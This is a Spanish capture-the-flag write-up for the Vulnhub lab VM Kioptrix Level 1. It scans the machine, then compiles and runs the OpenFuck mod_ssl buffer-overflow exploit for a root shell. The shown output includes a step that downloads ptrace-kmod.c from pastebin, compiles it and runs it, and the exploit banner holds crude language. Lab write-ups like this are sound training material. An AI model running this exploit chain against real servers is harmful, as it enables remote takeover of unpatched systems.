Writeup de la máquina Kioptrix Level 1


Libro con gafas y lampara Aquí os dejo el writeup de la máquina Kioptrix level 1. La máquina está marcada como fácil.

Arrancar VM

Para descargar la máquina la podemos encontrar en Vulnhub o en su propia web: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar En mi caso tuve que cargar la máquina en VMWare Workstation ya que en Proxmox o VirtualBox no me acabó de funcionar.

Al encenderla encontraremos el siguiente login. Login de Kioptrix 1

Utilizar VM de root-me.org

Si no tenemos ganas de descargarnos la máquina o simplemente no podemos tenemos la opción de utilizar las máquinas de https://root-me.org.

Encontrar la IP

Para encontrar la IP dentro de nuestra red podemos utiliza la herramienta nmap o netdiscover. En nuestro caso utilizaremos netdiscover:

netdiscover

Netdiscover

En mi caso la IP que tiene asignada la máquina es la 192.168.0.142.

Realizar escaneado

Realizaremos un escaneado de los puertos para ver los servicios que se peuden encontrar:

nmap -A -Pn -n -p- 192.168.0.142

El resultado:

Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-21 19:22 CET
Nmap scan report for 192.168.0.142
Host is up (0.00064s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1          32768/tcp   status
|_  100024  1          32768/udp   status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2020-11-22T01:23:33+00:00; +7h00m05s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:AC:92:2B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 7h00m04s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.0.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.73 seconds

Como podemos ver existen varios servicios abiertos, salta a la vista la versión de Apache:"Apache httpd 1.3.20", nos centramos en esta versión.

Hacemos una búsqueda con la herramienta searchsploit:

searchsploit apache 1.3.20

Searchsploit

Vemos que hay bastantes exploits, después de probar varios de los exploits finalmente me funciona el "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow".

Explotando

Para poder explotar compilamos el exploit:

cd /tmp && cp /usr/share/exploitdb/exploits/unix/remote/21671.c . && gcc -o 21671 21671.c -lcrypto

Sin embargo nos da bastantes errores por culpa de la versión de SSL. Openfuck

Tras unas búsquedas vemos que alguien, concretamente Wilton Wernik, ha arreglado la codificación del exploit y funciona perfectamente: https://github.com/heltonWernik/OpenLuck

Descargamos y compilamos el exploit:

wget https://raw.githubusercontent.com/heltonWernik/OpenLuck/master/OpenFuck.c
gcc -o OpenFuck OpenFuck.c -lcrypto

Ejecutamos la ayuda del exploit:

./OpenFuck -h
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./OpenFuck target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)


  Supported OffSet:
    0x00 - Caldera OpenLinux (apache-1.3.26)
    0x01 - Cobalt Sun 6.0 (apache-1.3.12)
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x03 - Cobalt Sun x (apache-1.3.26)
    0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
    0x05 - Conectiva 4 (apache-1.3.6)
    0x06 - Conectiva 4.1 (apache-1.3.9)
    0x07 - Conectiva 6 (apache-1.3.14)
    0x08 - Conectiva 7 (apache-1.3.12)
    0x09 - Conectiva 7 (apache-1.3.19)
    0x0a - Conectiva 7/8 (apache-1.3.26)
    0x0b - Conectiva 8 (apache-1.3.22)
    0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
    0x0d - Debian GNU Linux (apache_1.3.19-1)
    0x0e - Debian GNU Linux (apache_1.3.22-2)
    0x0f - Debian GNU Linux (apache-1.3.22-2.1)
    0x10 - Debian GNU Linux (apache-1.3.22-5)
    0x11 - Debian GNU Linux (apache_1.3.23-1)
    0x12 - Debian GNU Linux (apache_1.3.24-2.1)
    0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
    0x14 - Debian GNU Linux (apache_1.3.24-3)
    0x15 - Debian GNU Linux (apache-1.3.26-1)
    0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
    0x17 - Debian GNU Linux (apache-1.3.27)
    0x18 - FreeBSD (apache-1.3.9)
    0x19 - FreeBSD (apache-1.3.11)
    0x1a - FreeBSD (apache-1.3.12.1.40)
    0x1b - FreeBSD (apache-1.3.12.1.40)
    0x1c - FreeBSD (apache-1.3.12.1.40)
    0x1d - FreeBSD (apache-1.3.12.1.40_1)
    0x1e - FreeBSD (apache-1.3.12)
    0x1f - FreeBSD (apache-1.3.14)
    0x20 - FreeBSD (apache-1.3.14)
    0x21 - FreeBSD (apache-1.3.14)
    0x22 - FreeBSD (apache-1.3.14)
    0x23 - FreeBSD (apache-1.3.14)
    0x24 - FreeBSD (apache-1.3.17_1)
    0x25 - FreeBSD (apache-1.3.19)
    0x26 - FreeBSD (apache-1.3.19_1)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x2b - FreeBSD (apache-1.3.22)
    0x2c - FreeBSD (apache-1.3.22_7)
    0x2d - FreeBSD (apache_fp-1.3.23)
    0x2e - FreeBSD (apache-1.3.24_7)
    0x2f - FreeBSD (apache-1.3.24+2.8.8)
    0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
    0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
    0x32 - FreeBSD (apache-1.3.27)
    0x33 - Gentoo Linux (apache-1.3.24-r2)
    0x34 - Linux Generic (apache-1.3.14)
    0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
    0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
    0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
    0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
    0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
    0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
    0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
    0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
    0x42 - Mandrake Linux 8.2 (apache-1.3.24)
    0x43 - Mandrake Linux 9 (apache-1.3.26)
    0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
    0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
    0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
    0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
    0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
    0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
    0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
    0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
    0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
    0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
    0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
    0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
    0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
    0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
    0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
    0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
    0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
    0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
    0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
    0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
    0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
    0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
    0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
    0x5b - Redhat Linux 7.x (apache-1.3.22)
    0x5c - RedHat Linux 7.x (apache-1.3.26-1)
    0x5d - RedHat Linux 7.x (apache-1.3.27)
    0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
    0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
    0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
    0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
    0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
    0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
    0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
    0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
    0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
    0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
    0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
    0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
    0x6d - RedHat Linux 7.2 (apache-1.3.24)
    0x6e - RedHat Linux 7.2 (apache-1.3.26)
    0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
    0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
    0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
    0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
    0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
    0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
    0x75 - RedHat Linux 7.3 (apache-1.3.27)
    0x76 - RedHat Linux 8.0 (apache-1.3.27)
    0x77 - RedHat Linux 8.0-second (apache-1.3.27)
    0x78 - RedHat Linux 8.0 (apache-2.0.40)
    0x79 - Slackware Linux 4.0 (apache-1.3.6)
    0x7a - Slackware Linux 7.0 (apache-1.3.9)
    0x7b - Slackware Linux 7.0 (apache-1.3.26)
    0x7c - Slackware 7.0  (apache-1.3.26)2
    0x7d - Slackware Linux 7.1 (apache-1.3.12)
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x7f - Slackware Linux 8.1 (apache-1.3.24)
    0x80 - Slackware Linux 8.1 (apache-1.3.26)
    0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
    0x82 - Slackware Linux (apache-1.3.27)
    0x83 - SuSE Linux 7.0 (apache-1.3.12)
    0x84 - SuSE Linux 7.1 (apache-1.3.17)
    0x85 - SuSE Linux 7.2 (apache-1.3.19)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)
    0x87 - SuSE Linux 8.0 (apache-1.3.23)
    0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
    0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
    0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)

Fuck to all guys who like use lamah ddos. Read SRC to have no surprise

Como podemos ver existen diferentes versiones para las diferentes versiones de varias distribuciones Gnu/Linux, tras probar varios encontramos que la opción correcta es: 0x6b

./OpenFuck 0x6d 192.168.0.142 443 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
Good Bye!

En este caso no ha llegado a explotar, subimos las conexiones:

./OpenFuck 0x6b 192.168.0.142 443 -c 100

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 100 of 100
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt 
--20:48:21--  https://pastebin.com/raw/C7v25Xr9
           => `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    0K ...                                                    @   3.84 MB/s

20:48:21 (3.84 MB/s) - `ptrace-kmod.c' saved [4026]

ptrace-kmod.c:183:1: warning: no newline at end of file
[+] Attached to 1157
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

En este caso a funcionado y estamos dentro, además, podemos comprobar que directamente somos usuario root, por lo que no hace falta hacer escalada de privilegios en este caso:

whoami
root

Y con esto finalizamos, espero que os haya servido para aprender algo nuevo.